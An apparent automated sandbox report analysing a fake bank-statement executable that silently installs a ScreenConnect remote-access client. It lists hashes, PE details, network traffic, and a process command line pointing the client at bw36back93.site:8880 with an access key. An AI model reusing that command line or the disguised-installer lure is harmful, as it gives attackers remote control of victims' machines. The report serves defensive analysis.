                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):1.4216858940245332
                                                                    Encrypted:false
                                                                    SSDEEP:48:94bubO+xFX4vT5hUe95dtPYqcq56AdufSioLUgakafd4PkeEDkCrMQLLomrmAduQ:ubwsTXNnPNpGfoLI7d4VElrxSF
                                                                    MD5:26A6CD3C43011EC0C4180CBA86547FDD
                                                                    SHA1:947CD9850F8B5BBCB502AD2E202ABC81536F5376
                                                                    SHA-256:148B8E44F1FCF900B565537D4CE7C90A5D8EDC0EDD774071AC1ECCCD6BD54474
                                                                    SHA-512:CAB56502EA0224E654EE8050CF1CC42953B3148A5C04A334D916DC3464E0865E9C401E30813533741BB96D6D4A05CEBA7697D80AACE28BF20F8F6E91EB2EB081
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.8020962802812714
                                                                    Encrypted:false
                                                                    SSDEEP:48:Ut8PhDuRc06WX4uFT5x95dtPYqcq56AdufSioLUgakafd4PkeEDkCrMQLLomrmAB:UQhD1eFTDnPNpGfoLI7d4VElrxSF
                                                                    MD5:E6D239E2C73C8C1E125945346DFBE005
                                                                    SHA1:37F6CCFBCDEADA510F9B990E2FF55A838B0D7066
                                                                    SHA-256:96F5A9621CFEFD2576282462B02AB0291983F129207BFDAF94B067E5B5665D36
                                                                    SHA-512:86BF98106A06C40CD958626D50E2C9C805E1DFF684E833C889D4F5782A65AA89F495BE9D41A40B4E7BE43A98EA01DA7F5E86E06543AF3710C32FE8BADCBD8FC3
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):1.4216858940245332
                                                                    Encrypted:false
                                                                    SSDEEP:48:94bubO+xFX4vT5hUe95dtPYqcq56AdufSioLUgakafd4PkeEDkCrMQLLomrmAduQ:ubwsTXNnPNpGfoLI7d4VElrxSF
                                                                    MD5:26A6CD3C43011EC0C4180CBA86547FDD
                                                                    SHA1:947CD9850F8B5BBCB502AD2E202ABC81536F5376
                                                                    SHA-256:148B8E44F1FCF900B565537D4CE7C90A5D8EDC0EDD774071AC1ECCCD6BD54474
                                                                    SHA-512:CAB56502EA0224E654EE8050CF1CC42953B3148A5C04A334D916DC3464E0865E9C401E30813533741BB96D6D4A05CEBA7697D80AACE28BF20F8F6E91EB2EB081
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):0.06942090702348508
                                                                    Encrypted:false
                                                                    SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOsY3hQ7GyVky6l3X:2F0i8n0itFzDHFsY3h2E3X
                                                                    MD5:FF1B290F5DC0D69CAA74A4DFB60E957C
                                                                    SHA1:F048D305A31872F4D914843215896A1E96114C11
                                                                    SHA-256:16856E34128259CB69C898CF5C802D84A849A699BE28BBCB3113C3814D371FFC
                                                                    SHA-512:B4703F34507BD50ECD5B50F90F51583FA5BDA14099CACE17EA081867E34E443B0AEBE77EB2B3E03CA3E33A570B440171A51F387561A9AE5A6CF9E3ABF317A219
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.411027036190251
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:2024-11 eStmt 5563019.exe
                                                                    File size:5'474'600 bytes
                                                                    MD5:cfd5440eaeb5064ac2de9b51eae3ab36
                                                                    SHA1:525c75f4ce4bda66437086c85330e3a25729f3ae
                                                                    SHA256:3480dfb2e9fa90eb525178e8dd926ae4a760473e14ca3655e48cd88c8c21ece9
                                                                    SHA512:e53e58f689f226f0f29ba796a4a41d196f54dd29da1bc09ab5bac665fb4ea32f780be2288698d2ec13781f50c10275b7eb1f0e312cdf65386ade8d89372edd4f
                                                                    SSDEEP:98304:ips6efPfBOPvLtabi4X0MV+dYdcGt7VIb4:EfefPJws3V+a
                                                                    TLSH:EB46E001F3D695B5D1BF1678D87A526A9734BC048312C7BF6390BD692D32BC08E327A6
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                                    Icon Hash:90cececece8e8eb0
                                                                    Entrypoint:0x4014ad
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:true
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                    Signature Valid:true
                                                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                    Signature Validation Error:The operation completed successfully
                                                                    Error Number:0
                                                                    Not Before, Not After
                                                                    • 17/08/2022 01:00:00 16/08/2025 00:59:59
                                                                    Subject Chain
                                                                    • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                    Version:3
                                                                    Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                    Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                    Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                    Serial:0B9360051BCCF66642998998D5BA97CE
                                                                    Instruction
                                                                    call 00007FA9510410CAh
                                                                    jmp 00007FA951040B7Fh
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push 00000000h
                                                                    call dword ptr [0040D040h]
                                                                    push dword ptr [ebp+08h]
                                                                    call dword ptr [0040D03Ch]
                                                                    push C0000409h
                                                                    call dword ptr [0040D044h]
                                                                    push eax
                                                                    call dword ptr [0040D048h]
                                                                    pop ebp
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 00000324h
                                                                    push 00000017h
                                                                    call dword ptr [0040D04Ch]
                                                                    test eax, eax
                                                                    je 00007FA951040D07h
                                                                    push 00000002h
                                                                    pop ecx
                                                                    int 29h
                                                                    mov dword ptr [004148D8h], eax
                                                                    mov dword ptr [004148D4h], ecx
                                                                    mov dword ptr [004148D0h], edx
                                                                    mov dword ptr [004148CCh], ebx
                                                                    mov dword ptr [004148C8h], esi
                                                                    mov dword ptr [004148C4h], edi
                                                                    mov word ptr [004148F0h], ss
                                                                    mov word ptr [004148E4h], cs
                                                                    mov word ptr [004148C0h], ds
                                                                    mov word ptr [004148BCh], es
                                                                    mov word ptr [004148B8h], fs
                                                                    mov word ptr [004148B4h], gs
                                                                    pushfd
                                                                    pop dword ptr [004148E8h]
                                                                    mov eax, dword ptr [ebp+00h]
                                                                    mov dword ptr [004148DCh], eax
                                                                    mov eax, dword ptr [ebp+04h]
                                                                    mov dword ptr [004148E0h], eax
                                                                    lea eax, dword ptr [ebp+08h]
                                                                    mov dword ptr [004148ECh], eax
                                                                    mov eax, dword ptr [ebp-00000324h]
                                                                    mov dword ptr [00414828h], 00010001h
                                                                    Programming Language:
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 build 21022
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x508480.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x51b6000x1d328
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x51f0000xea8.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x160000x5084800x5086006fc0b587e4c4417dc2f185cdcde945ccunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x51f0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    FILES0x163d80x81c00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.3974176601637765
                                                                    FILES0x97fd80x1a3000PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.5121049880981445
                                                                    FILES0x23afd80x1aa00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.44170884683098594
                                                                    FILES0x2559d80x2c7320PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9811277389526367
                                                                    FILES0x51ccf80x1600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3908025568181818
                                                                    RT_MANIFEST0x51e2f80x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                    DLLImport
                                                                    mscoree.dllCorBindToRuntimeEx
                                                                    KERNEL32.dllGetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                                    OLEAUT32.dllVariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Nov 22, 2024 01:34:39.329555988 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:34:39.449368000 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:39.449476004 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:34:39.971590996 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:34:40.092170954 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:40.834218979 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:40.887217999 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:34:40.992257118 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:34:41.112179995 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:41.459537029 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:41.590317011 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:34:41.934238911 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:41.934326887 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:41.934499025 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:34:42.662322044 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:34:42.662322998 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:34:42.662322998 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:34:42.662389994 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:34:42.662389994 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:34:42.782525063 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:42.782567978 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:42.782596111 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:42.782624960 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:42.782653093 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:42.782680988 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:42.782711983 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:34:42.782711983 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:34:42.782711983 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:34:42.782711983 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:34:42.782738924 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:42.782762051 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:34:42.782767057 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:42.782793999 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:42.782820940 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:42.782856941 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:42.782882929 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:42.902060986 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:42.902621031 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:42.902666092 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:42.902695894 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:42.902749062 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:42.902776003 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:42.902834892 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:42.902863979 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:43.344487906 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:34:43.387337923 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:35:43.356066942 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:35:43.475585938 CET888049731176.123.1.130192.168.2.4
                                                                    Nov 22, 2024 01:36:43.481162071 CET497318880192.168.2.4176.123.1.130
                                                                    Nov 22, 2024 01:36:43.600779057 CET888049731176.123.1.130192.168.2.4
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Nov 22, 2024 01:34:38.751091003 CET6049353192.168.2.41.1.1.1
                                                                    Nov 22, 2024 01:34:39.298693895 CET53604931.1.1.1192.168.2.4
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Nov 22, 2024 01:34:38.751091003 CET192.168.2.41.1.1.10xd5a2Standard query (0)bw36back93.siteA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Nov 22, 2024 01:34:39.298693895 CET1.1.1.1192.168.2.40xd5a2No error (0)bw36back93.site176.123.1.130A (IP address)IN (0x0001)false

                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:19:34:32
                                                                    Start date:21/11/2024
                                                                    Path:C:\Users\user\Desktop\2024-11 eStmt 5563019.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\2024-11 eStmt 5563019.exe"
                                                                    Imagebase:0x5b0000
                                                                    File size:5'474'600 bytes
                                                                    MD5 hash:CFD5440EAEB5064AC2DE9B51EAE3AB36
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1729022620.0000000005860000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1703130673.00000000005C6000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1715569033.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:1
                                                                    Start time:19:34:33
                                                                    Start date:21/11/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\d519fd2fdcfe66e7\setup.msi"
                                                                    Imagebase:0x2f0000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:19:34:33
                                                                    Start date:21/11/2024
                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\msiexec.exe /V
                                                                    Imagebase:0x7ff73af20000
                                                                    File size:69'632 bytes
                                                                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:3
                                                                    Start time:19:34:33
                                                                    Start date:21/11/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 4AED0F1D3607922BE2F1EC6832F9BAE3 C
                                                                    Imagebase:0x2f0000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:19:34:33
                                                                    Start date:21/11/2024
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI4E28.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6377093 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                    Imagebase:0x520000
                                                                    File size:61'440 bytes
                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:19:34:35
                                                                    Start date:21/11/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding A5BF5D09ED87785AFA67BD755C799625
                                                                    Imagebase:0x2f0000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:19:34:36
                                                                    Start date:21/11/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 68F89B22406E06E7C28E4AD1705B01FD E Global\MSI0000
                                                                    Imagebase:0x2f0000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:19:34:36
                                                                    Start date:21/11/2024
                                                                    Path:C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bw36back93.site&p=8880&s=e250a80a-96da-47fd-91f2-1c092bc9b1b7&k=BgIAAACkAABSU0ExAAgAAAEAAQBVrCWSt%2b2cKthNAS8WCpzwBkW7gylKQJ6RDxIjHv%2fRvikga3OHVBUUk74eX5u2WDvyGlxXUsTAHstE3Rks8Zw%2f5nMdMDz%2ffz%2fdADWqNvA27WRDTbgEuKYVImg%2bRuQTeYBssAlSkC71PJ4gqNaRdbnySWnXqNuCohB8XKd6MUQapUfc4DXF0e7EWF1onYtP%2bZz6ui1%2fvm3P0miTphdoOYDPJyJmnFL6AS3%2bEi4fXJkHoPDDjsiShDMOBGrn%2bwsLLVTQZCpIQElO7sxadYkptz0t1JF7bRKqG2Z6vshgz%2fal71%2fFvdI1kgsL2h5jLyMZgmq6EW%2fOzhQCdP4oY8SDbMW0&c=SV&c=11-11%20NEWP&c=&c=&c=&c=&c=&c="
                                                                    Imagebase:0x2a0000
                                                                    File size:95'520 bytes
                                                                    MD5 hash:DC615E9D8EC81CBF2E2452516373E5A0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:8
                                                                    Start time:19:34:38
                                                                    Start date:21/11/2024
